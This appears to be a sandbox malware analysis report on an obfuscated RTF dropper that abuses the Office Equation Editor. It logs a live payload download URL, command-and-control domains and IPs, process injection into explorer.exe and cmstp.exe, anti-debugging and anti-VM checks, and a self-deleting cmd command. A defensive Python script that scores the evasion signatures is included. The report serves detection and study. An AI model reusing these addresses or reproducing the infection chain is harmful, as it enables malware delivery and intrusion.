          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFE24 NtWriteVirtualMemory,9_2_01EBFE24
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_000AA320 NtCreateFile,9_2_000AA320
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_000AA3D0 NtReadFile,9_2_000AA3D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_000AA450 NtClose,9_2_000AA450
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_000AA500 NtAllocateVirtualMemory,9_2_000AA500
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_000AA3CA NtReadFile,9_2_000AA3CA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_000AA44A NtClose,9_2_000AA44A
          Source: SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.LNK.0.drLNK file: ..\..\..\..\..\Desktop\SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtf
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$curiteInfo.com.RTF.Obfuscated-gen.19663.16514.rtfJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winRTF@429/12@5/4
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtfReversingLabs: Detection: 48%
          Source: SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtfVirustotal: Detection: 55%
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Users\user\AppData\Roaming\word.exeProcess created: C:\Users\user\AppData\Local\Temp\twbcaze.exe "C:\Users\user\AppData\Local\Temp\twbcaze.exe"
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeProcess created: C:\Users\user\AppData\Local\Temp\twbcaze.exe C:\Users\user\AppData\Local\Temp\twbcaze.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\twbcaze.exe"
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess created: C:\Users\user\AppData\Local\Temp\twbcaze.exe "C:\Users\user\AppData\Local\Temp\twbcaze.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeProcess created: C:\Users\user\AppData\Local\Temp\twbcaze.exe C:\Users\user\AppData\Local\Temp\twbcaze.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\twbcaze.exe"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR66FC.tmpJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00402053 CoCreateInstance,MultiByteToWideChar,5_2_00402053
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,5_2_00404292
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCommand line argument: tvxyldblemyhw6_2_00401000
          Source: EQNEDT32.EXEString found in binary or memory: https://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exe
          Source: EQNEDT32.EXEString found in binary or memory: http://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exe
          Source: EQNEDT32.EXEString found in binary or memory: tps://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exe
          Source: EQNEDT32.EXEString found in binary or memory: /wp-content/uploads/wpr-addons/forms/balokarat2.1.exe
          Source: EQNEDT32.EXEString found in binary or memory: T /wp-content/uploads/wpr-addons/forms/balokarat2.1.exe HTTP/1.1
          Source: EQNEDT32.EXEString found in binary or memory: tp://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: twbcaze.exe, twbcaze.exe, 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, twbcaze.exe, 00000007.00000003.353742446.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, twbcaze.exe, 00000007.00000003.353487923.0000000000430000.00000004.00000020.00020000.00000000.sdmp, twbcaze.exe, 00000007.00000002.363230284.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, cmstp.exe, 00000009.00000003.363443838.0000000001D20000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000009.00000002.879405399.0000000002030000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000009.00000003.363187187.0000000001BC0000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: cmstp.pdb source: twbcaze.exe, 00000007.00000002.363156888.00000000002A0000.00000040.10000000.00040000.00000000.sdmp, twbcaze.exe, 00000007.00000002.363191563.00000000005B4000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000009.00000002.879251773.00000000000D0000.00000040.80000000.00040000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe :: Unpacked PE file: 7.2.twbcaze.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.00cfg:R;.tls:W;.voltbl:R; vs .text:ER;
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE :: Code function: 2_2_002A6D32 push ecx; ret 2_2_002A6D33
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE :: Code function: 2_2_00294236 push es; retf 2_2_00294237
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE :: Code function: 2_2_00294F08 pushad ; retf 002Ah 2_2_00294F09
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE :: Code function: 2_2_002A4562 push es; retf 2_2_002A4563
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE :: Code function: 2_2_002A5865 push FFFFFFB1h; ret 2_2_002A5867
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE :: Code function: 2_2_00290142 push es; iretd 2_2_00290169
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE :: Code function: 2_2_00294EE8 pushad ; retf 002Ah 2_2_00294EE9
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE :: Code function: 2_2_002A67EE push esp; ret 2_2_002A67EF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE :: Code function: 2_2_002A67E6 push esp; ret 2_2_002A67E7
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE :: Code function: 2_2_002A82E6 push ebp; ret 2_2_002A82E7
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE :: Code function: 2_2_002A84F8 push ebp; ret 2_2_002A84FB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE :: Code function: 2_2_002901F4 push eax; retf 2_2_002901F5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE :: Code function: 2_2_002A7CC8 push esp; ret 2_2_002A7CCB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE :: Code function: 2_2_002A75C9 push esp; ret 2_2_002A75CB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE :: Code function: 2_2_002A7CD0 push esp; ret 2_2_002A7CD3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE :: Code function: 2_2_002A82D4 push ebp; ret 2_2_002A82DF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE :: Code function: 2_2_0029A5D6 push es; retf 2_2_0029A5D7
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe :: Code function: 6_2_0040FA51 push ecx; ret 6_2_0040FA64
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe :: Code function: 7_2_00416A89 push eax; retf 7_2_00416A8A
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe :: Code function: 7_2_0041A31B push eax; retf 7_2_0041A31C
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe :: Code function: 7_2_0041C3A6 push es; iretd 7_2_0041C3AA
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe :: Code function: 7_2_0041D475 push eax; ret 7_2_0041D4C8
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe :: Code function: 7_2_0041D4C2 push eax; ret 7_2_0041D4C8
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe :: Code function: 7_2_0041D4CB push eax; ret 7_2_0041D532
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe :: Code function: 7_2_00417CAD pushad ; ret 7_2_00417CAE
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe :: Code function: 7_2_0041D52C push eax; ret 7_2_0041D532
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe :: Code function: 7_2_004176C2 pushad ; iretd 7_2_004176C3
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe :: Code function: 7_2_0041EFF7 push dword ptr [98C25110h]; ret 7_2_0041F073
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe :: Code function: 7_2_0084DFA1 push ecx; ret 7_2_0084DFB4
Source: C:\Windows\explorer.exe :: Code function: 8_2_0818C9B5 push esp; retn 0000h 8_2_0818CAE7
Source: C:\Windows\explorer.exe :: Code function: 8_2_0818CB1E push esp; retn 0000h 8_2_0818CB1F
Source: twbcaze.exe.5.dr :: Static PE information: section name: .00cfg
Source: twbcaze.exe.5.dr :: Static PE information: section name: .voltbl
Source: C:\Users\user\AppData\Roaming\word.exe :: File created: C:\Users\user\AppData\Local\Temp\twbcaze.exe (dropped file)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE :: File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\balokarat2.1[1].exe (dropped file)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE :: File created: C:\Users\user\AppData\Roaming\word.exe (dropped file)

Hooking and other Techniques for Hiding and Protection

Source: explorer.exe :: User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xEF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE :: Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE :: Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE :: Process information set: NOOPENFILEERRORBOX (42 identical entries collapsed)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE :: Process information set: NOOPENFILEERRORBOX (3 identical entries collapsed)
Source: C:\Users\user\AppData\Roaming\word.exe :: Process information set: NOOPENFILEERRORBOX (5 identical entries collapsed)
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe :: Process information set: NOOPENFILEERRORBOX (4 identical entries collapsed)
Source: C:\Windows\explorer.exe :: Process information set: NOOPENFILEERRORBOX (4 identical entries collapsed)
Source: C:\Windows\SysWOW64\cmstp.exe :: Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe RDTSC instruction interceptor: First address: 0000000000409904, second address: 000000000040990A, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe RDTSC instruction interceptor: First address: 0000000000409B6E, second address: 0000000000409B74, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe RDTSC instruction interceptor: First address: 0000000000099904, second address: 000000000009990A, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe RDTSC instruction interceptor: First address: 0000000000099B6E, second address: 0000000000099B74, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess (graph_6-17443)
Source: C:\Windows\explorer.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) (graph_8-13974)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2300 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\explorer.exe TID: 3332 Thread sleep time: -15390000s >= -30000s
Source: C:\Windows\explorer.exe TID: 1340 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\explorer.exe TID: 3332 Thread sleep time: -4416000s >= -30000s
Source: C:\Windows\SysWOW64\cmstp.exe TID: 3292 Thread sleep count: 136 > 30
Source: C:\Windows\SysWOW64\cmstp.exe TID: 3292 Thread sleep time: -272000s >= -30000s
Source: C:\Windows\SysWOW64\cmstp.exe TID: 3292 Thread sleep count: 9836 > 30
Source: C:\Windows\SysWOW64\cmstp.exe TID: 3292 Thread sleep time: -19672000s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3360 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\cmstp.exe Last function: Thread delayed (2 occurrences)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 7695
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 2208
Source: C:\Windows\SysWOW64\cmstp.exe Window / User API: threadDelayed 9836
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 7_2_00409AA0 rdtsc
Source: C:\Users\user\AppData\Roaming\word.exe API call chain: ExitProcess graph end node (graph_5-3463)
Source: explorer.exe, 00000008.00000002.879285316.00000000001D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7
Source: explorer.exe, 00000008.00000002.880167411.0000000003E59000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000008.00000002.880167411.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000008.00000002.880167411.0000000003E59000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}eeab7790
Source: explorer.exe, 00000008.00000000.354257988.00000000025E0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0a
Source: explorer.exe, 00000008.00000002.880167411.0000000003E59000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}100\4&20
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 6_2_002307DA GetSystemInfo
Source: C:\Users\user\AppData\Roaming\word.exe Code function: 5_2_00405E93 FindFirstFileA,FindClose
Source: C:\Users\user\AppData\Roaming\word.exe Code function: 5_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA
Source: C:\Users\user\AppData\Roaming\word.exe Code function: 5_2_00402671 FindFirstFileA
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 6_2_004203E8 _free,_free,FindFirstFileExW
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 6_2_0042049C FindFirstFileExW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 6_2_004132A3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 6_2_0041DCB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 6_2_0023005F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 6_2_0023013E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 6_2_00230109 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 6_2_0023017B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 7_2_00830080 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 7_2_008300EA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 7_2_008526F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 9_2_01EB00EA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 9_2_01EB0080 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 9_2_01ED26F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmstp.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 6_2_004156E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 6_2_0041C365 GetProcessHeap
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 7_2_00409AA0 rdtsc
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\cmstp.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 7_2_0040ACE0 LdrLoadDll
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 6_2_0040F6FD SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 6_2_004156E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 6_2_0040FEFD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 6_2_0040F709 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
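The evasion evidence in this section comes in a handful of recurring shapes: paired RDTSC reads a few bytes apart (the xor ecx, ecx / add ecx, eax between them copies the low dword of the first timestamp into ecx so the second read can be subtracted from it), sleeps at or past the 30000 ms threshold, sleep loops of more than 30 iterations, PEB reads through fs:[30h], and NtQueryInformationProcess DebugPort checks. The following is an added example written for this page, not code from the Joe Sandbox report or from Joe Security: it parses lines in the report's "Source:" format and scores them per process. The sample lines are constructed from the report's own signature lines (paths, addresses and values copied from this section); the signal weights, the 5-point "evasive" cut-off and the treatment of the report's negative sleep figures as millisecond values are assumptions of the example.

```python
"""Score Joe Sandbox evasion signatures per process (added example; not report code)."""
import re
from collections import defaultdict

# Constructed from the report's 'Malware Analysis System Evasion' lines.
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc",
    r"Source: C:\Windows\SysWOW64\cmstp.exe RDTSC instruction interceptor: First address: 0000000000099B6E second address: 0000000000099B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc",
    r"Source: C:\Windows\explorer.exe TID: 3332 Thread sleep time: -15390000s >= -30000s",
    r"Source: C:\Windows\SysWOW64\cmstp.exe TID: 3292 Thread sleep count: 9836 > 30",
    r"Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 6_2_004132A3 mov eax, dword ptr fs:[00000030h]",
    r"Source: C:\Windows\SysWOW64\cmstp.exe Code function: 9_2_01EB0080 mov ecx, dword ptr fs:[00000030h]",
    r"Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Process queried: DebugPort",
    r"Source: C:\Windows\SysWOW64\cmstp.exe Process queried: DebugPort",
]

SOURCE_RE = re.compile(r"^Source:\s*(.+?\.exe)\s*(.*)$", re.IGNORECASE)
RDTSC_RE = re.compile(r"RDTSC instruction interceptor: First address: ([0-9A-Fa-f]+) second address: ([0-9A-Fa-f]+)")
# The report writes sleep values with a leading minus sign; the sign is ignored here (assumption: values are ms).
SLEEP_TIME_RE = re.compile(r"Thread sleep time: -?(\d+)s >= -?(\d+)s")
SLEEP_COUNT_RE = re.compile(r"Thread sleep count: (\d+) > (\d+)")
PEB_RE = re.compile(r"fs:\[0*30h\]")          # TEB+0x30 = PEB pointer on 32-bit Windows
DEBUGPORT_RE = re.compile(r"Process queried: DebugPort")

# Weights are this example's assumption, not Joe Sandbox scoring.
WEIGHTS = {"rdtsc_delta": 3, "long_sleep": 2, "sleep_loop": 2, "peb_read": 1, "debugport_query": 2}


def rdtsc_gap(line):
    """Byte distance between the two rdtsc reads named in an interceptor line, or None."""
    m = RDTSC_RE.search(line)
    if not m:
        return None
    return int(m.group(2), 16) - int(m.group(1), 16)


def classify(line):
    """Return (process basename, signal name) for a line that carries an evasion signal, else None."""
    m = SOURCE_RE.match(line)
    if not m:
        return None
    proc = m.group(1).replace("/", "\\").rsplit("\\", 1)[-1].lower()
    rest = m.group(2)
    if RDTSC_RE.search(rest):
        return proc, "rdtsc_delta"
    st = SLEEP_TIME_RE.search(rest)
    if st and int(st.group(1)) >= int(st.group(2)):
        return proc, "long_sleep"
    sc = SLEEP_COUNT_RE.search(rest)
    if sc and int(sc.group(1)) > int(sc.group(2)):
        return proc, "sleep_loop"
    if PEB_RE.search(rest):
        return proc, "peb_read"
    if DEBUGPORT_RE.search(rest):
        return proc, "debugport_query"
    return None


def score_lines(lines):
    """Aggregate signals per process: {proc: {"signals": [...], "score": int}} (one hit per line)."""
    out = defaultdict(lambda: {"signals": [], "score": 0})
    for line in lines:
        hit = classify(line)
        if hit is None:
            continue
        proc, sig = hit
        out[proc]["signals"].append(sig)
        out[proc]["score"] += WEIGHTS[sig]
    return dict(out)


def evasive_processes(lines, cutoff=5):
    """Processes whose combined score reaches the cut-off, highest score first."""
    scored = score_lines(lines)
    return sorted((p for p, v in scored.items() if v["score"] >= cutoff),
                  key=lambda p: (-scored[p]["score"], p))


if __name__ == "__main__":
    for proc, v in sorted(score_lines(SAMPLE_LINES).items()):
        print(f"{proc:14} score={v['score']:2} signals={v['signals']}")
    print("evasive:", evasive_processes(SAMPLE_LINES))
```

On the report's own lines the two RDTSC pairs are 6 bytes apart, which is exactly the offset of the second rdtsc in the listed instruction stream; cmstp.exe and the second twbcaze.exe instance collect every signal type and come out on top, while explorer.exe only carries the long sleep it inherited from the injected code.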

          HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Network Connect: 103.150.181.71 80
Source: C:\Windows\explorer.exe Domain query: www.allamericanshuttlellc.com
Source: C:\Windows\explorer.exe Domain query: www.6061k.vip
Source: C:\Windows\explorer.exe Domain query: www.shucaimh.com
Source: C:\Windows\explorer.exe Domain query: www.xazeyu.net
Source: C:\Windows\explorer.exe Network Connect: 3.33.130.190 80
Source: C:\Windows\explorer.exe Network Connect: 107.164.111.101 80
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\twbcaze.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write (2 occurrences)
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: D0000
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Thread register set: target process: 1244
Source: C:\Windows\SysWOW64\cmstp.exe Thread register set: target process: 1244
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
Source: C:\Users\user\AppData\Roaming\word.exe Process created: C:\Users\user\AppData\Local\Temp\twbcaze.exe "C:\Users\user\AppData\Local\Temp\twbcaze.exe"
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Process created: C:\Users\user\AppData\Local\Temp\twbcaze.exe C:\Users\user\AppData\Local\Temp\twbcaze.exe
Source: C:\Windows\SysWOW64\cmstp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\twbcaze.exe"
Source: explorer.exe, 00000008.00000000.353969269.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.879285316.00000000001D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progman-
Source: explorer.exe, 00000008.00000002.879437350.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.354104889.0000000000720000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
